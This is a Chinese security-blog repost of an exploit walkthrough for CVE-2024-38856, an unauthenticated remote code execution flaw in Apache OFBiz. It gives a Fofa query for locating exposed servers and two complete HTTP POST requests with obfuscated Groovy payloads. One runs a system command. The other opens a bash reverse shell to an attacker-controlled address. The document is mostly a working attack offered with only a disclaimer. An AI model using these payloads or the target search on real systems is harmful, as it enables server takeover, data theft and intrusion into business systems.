Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)

admin
admin
admin
139701
文章
114
评论
2024年8月9日08:52:03评论26 views字数 1984阅读6分36秒阅读模式

漏洞简介

ApacheOFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

2024年8月,互联网上披露了ApacheOFBiz授权不当致代码执行漏洞(CVE-2024-38856),该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。

》》》影响范围《《《

Apache OFBiz <= 18.12.140

漏洞复现

步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~

# Fofa搜索语法app="Apache_OFBiz"

步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求头内容...

POST /webtools/control/main/ProgramExport HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Content-Type: application/x-www-form-urlencodedgroovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b

Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)

反弹shell脚本

POST /webtools/control/main/ProgramExport HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Content-Type: application/x-www-form-urlencodedgroovyProgram=u0022u0062u0061u0073u0068u0020u002Du0063u0020u007Bu0065u0063u0068u006Fu002Cu004Cu0032u004Au0070u0062u0069u0039u0069u0059u0058u004Eu006Fu0049u0043u0031u0070u0049u0044u0034u006Du0049u0043u0039u006Bu005Au0058u0059u0076u0064u0047u004Eu0077u004Cu007Au0045u0079u004Eu0079u0034u0077u004Cu006Au0041u0075u004Du0053u0038u0034u004Fu0044u0067u0034u0049u0044u0041u002Bu004Au006Au0045u003Du007Du007Cu007Bu0062u0061u0073u0065u0036u0034u002Cu002Du0064u007Du007Cu007Bu0062u0061u0073u0068u002Cu002Du0069u007Du0022u002Eu0065u0078u0065u0063u0075u0074u0065u0028u0029

        

原文始发于微信公众号(揽月安全团队):Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月9日08:52:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)https://cn-sec.com/archives/3045080.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息